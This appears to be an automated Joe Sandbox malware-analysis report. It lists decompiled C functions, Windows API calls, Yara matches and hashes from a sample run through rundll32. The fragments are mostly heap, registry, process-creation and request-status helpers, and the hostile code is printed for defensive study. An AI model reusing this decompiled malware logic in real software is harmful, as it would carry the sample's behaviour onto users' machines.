                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 7a2c116e448e091824565bc01bea0804819a86be768400ab68980978f71019c6
                                          • Instruction ID: efc2efcd531f9b232684143302f0be24fc8bdc7f6f97b4e85bc6fac76801dd48
                                          • Opcode Fuzzy Hash: 7a2c116e448e091824565bc01bea0804819a86be768400ab68980978f71019c6
                                          • Instruction Fuzzy Hash: 92319272A40209EFCF10DF98D885AADBBF5FB44724F5480EAE249AB311C774AD45CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0489215A Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E0489215A(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x489a2d8, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}














                                          0x0489215f
                                          0x04892164
                                          0x04892172
                                          0x04892178
                                          0x0489217c
                                          0x048921ed
                                          0x0489217e
                                          0x04892182
                                          0x04892185
                                          0x04892188
                                          0x0489218f
                                          0x04892190
                                          0x04892191
                                          0x04892193
                                          0x04892198
                                          0x0489219f
                                          0x048921a5
                                          0x048921a6
                                          0x048921a6
                                          0x048921ad
                                          0x048921ae
                                          0x048921af
                                          0x048921b3
                                          0x048921bf
                                          0x048921c5
                                          0x048921c6
                                          0x048921c6
                                          0x048921c8
                                          0x048921ce
                                          0x048921d0
                                          0x048921d5
                                          0x048921d6
                                          0x048921d6
                                          0x048921dc
                                          0x048921e5
                                          0x048921e7
                                          0x048921ea
                                          0x048921f9

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 04892172
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 5cae7e779592acaefe05c3774debcdaad599b02f280b38124bff4c116ca3a66d
                                          • Instruction ID: baabd4d575386afbcc1fb63f52cf66ffd28bba18b84d73805a118066622ce48c
                                          • Opcode Fuzzy Hash: 5cae7e779592acaefe05c3774debcdaad599b02f280b38124bff4c116ca3a66d
                                          • Instruction Fuzzy Hash: E1113631245341AFEB0A8F29C841BE97BA9DB53318F1841CEE540CB292C277A90BC760
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5300E Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(-00000002,?,?,00000000,?,?,00B51765,00000000,00000000), ref: 00B53049
                                            • Part of subcall function 00B65D9D: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,00B79420), ref: 00B65DB4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleInformationModuleProcessQuery
                                          • String ID:
                                          • API String ID: 2776635927-0
                                          • Opcode ID: 51bd3cd61a1289d22493f50c992cef7178dbd66ac9d43751ab5b14aa8a9250ac
                                          • Instruction ID: 4d9a074e9f25d2ca016c68ff2903dbc7f9b41427ac317ea8d32d6a6cf3f23890
                                          • Opcode Fuzzy Hash: 51bd3cd61a1289d22493f50c992cef7178dbd66ac9d43751ab5b14aa8a9250ac
                                          • Instruction Fuzzy Hash: 60213B31600309AFDB209F99D880BAA77E5EF44BD171844EAED458B290D771EE489B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04895347 Relevance: 1.6, APIs: 1, Instructions: 70synchronizationCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04895347(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
				intOrPtr _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v60;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t14;
				signed int* _t16;
				signed int _t25;
				signed int _t26;
				signed int* _t28;
				signed int _t30;

				_t28 = __ecx;
				_t14 =  *0x489a368; // 0x5249618
				_v12 = _t14;
				_t16 = _a12;
				_t30 = 8;
				if(_t16 != 0) {
					 *_t16 =  *_t16 & 0x00000000;
				}
				do {
					_t31 =  &_v68;
					if(E048924BC( &_v68) == 0) {
						goto L16;
					}
					_t30 = E04894BD6(_t31, _a4, _v12);
					if(_t30 == 0) {
						_t25 = E0489595A(_t31, 0x102, _t28, _t30); // executed
						_t30 = _t25;
						if(_t30 != 0) {
							if(_t30 == 0x102) {
								E0489A000 = E0489A000 + 0xea60;
							}
						} else {
							if(_v24 != 0xc8) {
								_t30 = 0xe8;
							} else {
								_t26 = _v20;
								if(_t26 == 0) {
									_t30 = 0x10d2;
								} else {
									_t28 = _a8;
									if(_t28 != 0) {
										_v60 = _v60 & _t30;
										 *_t28 = _v60;
										_t28 = _a12;
										if(_t28 != 0) {
											 *_t28 = _t26;
										}
									}
								}
							}
						}
					}
					E048915B9( &_v68, 0x102, _t28, _t30);
					L16:
				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x489a30c, 0) == 0x102);
				return _t30;
			}


















                                          0x04895347
                                          0x0489534d
                                          0x04895354
                                          0x0489535c
                                          0x04895362
                                          0x04895365
                                          0x04895367
                                          0x04895367
                                          0x0489536f
                                          0x0489536f
                                          0x04895379
                                          0x00000000
                                          0x00000000
                                          0x04895388
                                          0x0489538c
                                          0x04895390
                                          0x04895395
                                          0x04895399
                                          0x048953d5
                                          0x048953d7
                                          0x048953d7
                                          0x0489539b
                                          0x048953a2
                                          0x048953cc
                                          0x048953a4
                                          0x048953a4
                                          0x048953a9
                                          0x048953c5
                                          0x048953ab
                                          0x048953ab
                                          0x048953b0
                                          0x048953b5
                                          0x048953b8
                                          0x048953ba
                                          0x048953bf
                                          0x048953c1
                                          0x048953c1
                                          0x048953bf
                                          0x048953b0
                                          0x048953a9
                                          0x048953a2
                                          0x04895399
                                          0x048953e4
                                          0x048953e9
                                          0x048953e9
                                          0x0489540d

                                          APIs
                                          • WaitForSingleObject.KERNEL32(00000000,00000000,00000000,76DC81D0), ref: 048953F9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait
                                          • String ID:
                                          • API String ID: 24740636-0
                                          • Opcode ID: 26f799c3cffa7707eed52112780ef8ccd5bd208a9b7c5a90255822c4469f7085
                                          • Instruction ID: 5ce9d91fe35412f082284043b4b3f8d3e9fd700e30c7641d6b1580f1f0fee57a
                                          • Opcode Fuzzy Hash: 26f799c3cffa7707eed52112780ef8ccd5bd208a9b7c5a90255822c4469f7085
                                          • Instruction Fuzzy Hash: 92219D33700A09ABEF129E6DD880A6E77E5EB81354F5C4E29E802D7240EBB4ED15D751
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5FE23 Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00B5FE75
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 666db354c3fbca599e5d8807aeeb530da1e9bfa02bedaa12446096734df134ad
                                          • Instruction ID: d98af4824540761aa7ba35fabd685f9887ca1d3f6a75ef3cf69ae7fb359e07dd
                                          • Opcode Fuzzy Hash: 666db354c3fbca599e5d8807aeeb530da1e9bfa02bedaa12446096734df134ad
                                          • Instruction Fuzzy Hash: 90111B3220020AAFDF029FA9DC41ADA7BA6EF08371B058175FE2C96161CB31DD25DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04896D05 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 34%
                                          			E04896D05(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x489a348; // 0x9ad5a8
				_t4 = _t15 + 0x489b39c; // 0x5248944
				_t20 = _t4;
				_t6 = _t15 + 0x489b124; // 0x650047
				_t17 = E048969D2(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E04891109(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                          0x04896d0f
                                          0x04896d16
                                          0x04896d17
                                          0x04896d18
                                          0x04896d19
                                          0x04896d1f
                                          0x04896d24
                                          0x04896d24
                                          0x04896d2e
                                          0x04896d40
                                          0x04896d47
                                          0x04896d75
                                          0x04896d49
                                          0x04896d4b
                                          0x04896d50
                                          0x04896d72
                                          0x04896d52
                                          0x04896d55
                                          0x04896d5c
                                          0x04896d61
                                          0x04896d63
                                          0x04896d63
                                          0x04896d68
                                          0x04896d68
                                          0x04896d50
                                          0x04896d7c

                                          APIs
                                            • Part of subcall function 048969D2: SysFreeString.OLEAUT32(?), ref: 04896AB1
                                            • Part of subcall function 04891109: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,04892B23,004F0053,00000000,?), ref: 04891112
                                            • Part of subcall function 04891109: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,04892B23,004F0053,00000000,?), ref: 0489113C
                                            • Part of subcall function 04891109: memset.NTDLL ref: 04891150
                                          • SysFreeString.OLEAUT32(00000000), ref: 04896D68
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeString$lstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 397948122-0
                                          • Opcode ID: e50bab01ae90b98d43ac2e4dbb4990ae3a4a27f4517fe9414ba300184a01f582
                                          • Instruction ID: a28c6d0ca3c30d9df2ec54ade68e5697668bf2d8da6de82f6dd415067e62bd67
                                          • Opcode Fuzzy Hash: e50bab01ae90b98d43ac2e4dbb4990ae3a4a27f4517fe9414ba300184a01f582
                                          • Instruction Fuzzy Hash: E1015EB1500929BFDF119FA8CC04DAABBF8FB04654F084A25E915E6160F771AD11D791
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0489267F Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 89%
                                          			E0489267F(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E0489215A(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x489a348; // 0x9ad5a8
						_t9 = _t17 + 0x489ba38; // 0x444f4340
						_t20 = E0489250D( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x489a2d8, 0, _a4); // executed
					}
				}
				return _t26;
			}








                                          0x04892682
                                          0x04892688
                                          0x048926df
                                          0x0489268e
                                          0x04892699
                                          0x0489269e
                                          0x048926a2
                                          0x048926af
                                          0x048926b7
                                          0x048926c3
                                          0x048926cb
                                          0x048926d5
                                          0x048926d5
                                          0x048926a2
                                          0x048926e4

                                          APIs
                                            • Part of subcall function 0489215A: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 04892172
                                            • Part of subcall function 0489250D: lstrlen.KERNEL32(76DDF710,?,00000000,?,76DDF710), ref: 04892541
                                            • Part of subcall function 0489250D: StrStrA.SHLWAPI(00000000,?), ref: 0489254E
                                            • Part of subcall function 0489250D: RtlAllocateHeap.NTDLL(00000000,?), ref: 0489256D
                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,048961F6), ref: 048926D5
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Allocate$Freelstrlen
                                          • String ID:
                                          • API String ID: 2220322926-0
                                          • Opcode ID: db1e58844af2774f1b849c92c211c86434a4fbb6cc6a8d2d1d874fbb2e8837da
                                          • Instruction ID: 3c45b417c1dabd9c54786fc7254145382f8c39ae62d4fe092c23ec7a9432d86c
                                          • Opcode Fuzzy Hash: db1e58844af2774f1b849c92c211c86434a4fbb6cc6a8d2d1d874fbb2e8837da
                                          • Instruction Fuzzy Hash: 0C01AD76200908FFDF129F48DC00E9A77E9EB44390F184A65FA09C6560EB71FE90DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04897291 Relevance: 1.5, APIs: 1, Instructions: 32registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E04897291(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				void* _t18;

				if(_a4 == 0) {
					L2:
					_t18 =  *0x489a0c8(_a8, _a12,  &_a4);
					if(_t18 == 0) {
						RegCloseKey(_a4);
					}
					L4:
					return _t18;
				}
				_t14 =  *0x489a348; // 0x9ad5a8
				_t2 = _t14 + 0x489b180; // 0x720043
				_t16 = E048969D2(_t17, _a4, _a8, _a12, _t2, 0, 0, 0); // executed
				_t18 = _t16;
				if(_t18 == 0) {
					goto L4;
				}
				goto L2;
			}







                                          0x04897299
                                          0x048972c1
                                          0x048972d1
                                          0x048972d5
                                          0x048972da
                                          0x048972da
                                          0x048972e0
                                          0x048972e4
                                          0x048972e4
                                          0x0489729b
                                          0x048972a6
                                          0x048972b6
                                          0x048972bb
                                          0x048972bf
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          • RegCloseKey.ADVAPI32(00000000,?,04893DF0,3D048990,00000000,80000002,?,80000002,?,?,?,04896ECE,80000002), ref: 048972DA
                                            • Part of subcall function 048969D2: SysFreeString.OLEAUT32(?), ref: 04896AB1
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseFreeString
                                          • String ID:
                                          • API String ID: 3574410727-0
                                          • Opcode ID: 0ee64867ae1264c323b966c69009fb5a4807cb10afd694e0db33272b0f6e6231
                                          • Instruction ID: a95fe906792ab4cf5dacba25cb4c71f773925527633d715b1a42968afcc9ce40
                                          • Opcode Fuzzy Hash: 0ee64867ae1264c323b966c69009fb5a4807cb10afd694e0db33272b0f6e6231
                                          • Instruction Fuzzy Hash: 53F03A32110A18FBDF229E84DC05FA93BA8FB04B90F188920FE089A160C731ED609B94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B630FC Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00B516A1: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,00B79190,00000000,00B63103,?,00B5C793,?), ref: 00B516C0
                                            • Part of subcall function 00B516A1: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,00B79190,00000000,00B63103,?,00B5C793,?), ref: 00B516CB
                                            • Part of subcall function 00B516A1: _wcsupr.NTDLL ref: 00B516D8
                                            • Part of subcall function 00B516A1: lstrlenW.KERNEL32(00000000), ref: 00B516E0
                                          • ResumeThread.KERNEL32(00000004,?,00B5C793,?), ref: 00B63111
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
                                          • String ID:
                                          • API String ID: 3646851950-0
                                          • Opcode ID: 8c7f0661f49c88f43a3d1a3755c0d2c6bf48983af432099d8ef8022500ba861a
                                          • Instruction ID: 3454cf52ddfb4e77d40dfd5095b96363e0dcc4c6125ca73c2a6527779d0bd071
                                          • Opcode Fuzzy Hash: 8c7f0661f49c88f43a3d1a3755c0d2c6bf48983af432099d8ef8022500ba861a
                                          • Instruction Fuzzy Hash: F3D0A734244301E6EB213720CD1AB16BED0EF19F49F00C8E4FD89615B0C7398890E505
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B72AA6 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B72A98
                                            • Part of subcall function 00B72BEB: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,000250E4,00B50000), ref: 00B72C64
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionHelper2@8LoadRaise___delay
                                          • String ID:
                                          • API String ID: 123106877-0
                                          • Opcode ID: 58e9ffdbe5183075ae2f9793def5378806201477f8bf9db39a6e16cd1192a92c
                                          • Instruction ID: af13be50d5f738c92f190cea8c90951cd4c82fecfde1b10c70f032b52605140b
                                          • Opcode Fuzzy Hash: 58e9ffdbe5183075ae2f9793def5378806201477f8bf9db39a6e16cd1192a92c
                                          • Instruction Fuzzy Hash: 3FA00196AAD503BD312867526D87D3A029CD5C4FA2770CAEAB46E98591A9C028461031
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B72A8B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00B72A98
                                            • Part of subcall function 00B72BEB: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,000250E4,00B50000), ref: 00B72C64
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionHelper2@8LoadRaise___delay
                                          • String ID:
                                          • API String ID: 123106877-0
                                          • Opcode ID: 817fe9faebf0f797eea134759fa7b2f1f977c4d624fd1f852492149ea3c38f24
                                          • Instruction ID: 2d147381a4f8ed3f68fea97289a794229f9935fafd232fa55ca67d9a56a2497a
                                          • Opcode Fuzzy Hash: 817fe9faebf0f797eea134759fa7b2f1f977c4d624fd1f852492149ea3c38f24
                                          • Instruction Fuzzy Hash: 55A001A6AA96027D3128A7526D87E3A029CD5C0F62770C6EAB46EA8591A9C028461035
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04894C73 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04894C73(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x489a2d8, 0, _a4); // executed
				return _t2;
			}




                                          0x04894c7f
                                          0x04894c85

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000000,048955C4,00000000,?,?,00000000), ref: 04894C7F
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: da7b015c0176d925f02c539519712af401712064357b1cc147a9333a4b32093e
                                          • Instruction ID: 5b053899348031f1cfb9fb84def0cd507fc5a707131485c746e3429b7899d916
                                          • Opcode Fuzzy Hash: da7b015c0176d925f02c539519712af401712064357b1cc147a9333a4b32093e
                                          • Instruction Fuzzy Hash: 84B012B1300600FBCB255B40DE04F057A21E754700F044814F304000708A760C20FB15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04894DF6 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04894DF6(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x489a2d8, 0, _a4); // executed
				return _t2;
			}




                                          0x04894e02
                                          0x04894e08

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmpDownload File
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 0e734f7147582c778d49e6ca4f77b06a09c3720793c8b382cee1ad430ce9da4d
                                          • Instruction ID: c5915ca4b63cd211e1f744c21fdce307086262b411a6e26ec5801facc9e6d5ba
                                          • Opcode Fuzzy Hash: 0e734f7147582c778d49e6ca4f77b06a09c3720793c8b382cee1ad430ce9da4d
                                          • Instruction Fuzzy Hash: 10B01271100600BBDA055B40DD09F057B21F750700F044814F205400708A770C60FB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B61C01 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: c2f65416e1e434524ecce10a6342acc2950d3495e615cf979aae7c855b8f19cf
                                          • Instruction ID: a67eb43a32a66a9bf39c865a67c351fbd5f4fd73a35803ed2f98ac3fbd543482
                                          • Opcode Fuzzy Hash: c2f65416e1e434524ecce10a6342acc2950d3495e615cf979aae7c855b8f19cf
                                          • Instruction Fuzzy Hash: 16B01271140100ABDE014B10EE04F057A21A750701F004411F30D420708B3104A0EB04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00B5C6B8 Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000000,00B71A9A,00000000), ref: 00B5C6C4
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 4f7a5fbd6063e34d11a650e28706c62fba0cb0730bf356320a65af3575b9eb66
                                          • Instruction ID: 57c1c1fcaba41f99cc493cb46ec409ab4213a50189d91668af23d5beee2b476d
                                          • Opcode Fuzzy Hash: 4f7a5fbd6063e34d11a650e28706c62fba0cb0730bf356320a65af3575b9eb66
